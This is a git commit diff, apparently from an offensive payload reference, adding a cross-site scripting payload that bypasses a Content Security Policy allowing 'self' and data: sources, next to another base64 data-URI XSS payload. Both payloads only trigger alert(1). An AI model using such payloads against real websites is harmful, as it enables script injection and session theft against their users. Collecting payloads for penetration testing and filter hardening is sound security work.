SID history break trust + Powershell history + SCF files

2025-12-12 15:49:38 -08:00 · 2019-11-07 23:21:00 +01:00
parent 6fecedd880
commit f6d5221a85
4 changed files with 107 additions and 9 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -932,6 +932,15 @@ Works for CSP like `script-src self`
 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
 ```

+### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
+
+Works for CSP like `script-src 'self' data:`
+
+```javascript
+<script ?/src="data:+,\u0061lert%281%29">/</script>
+```
+
+
 ## Common WAF Bypass

 ### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019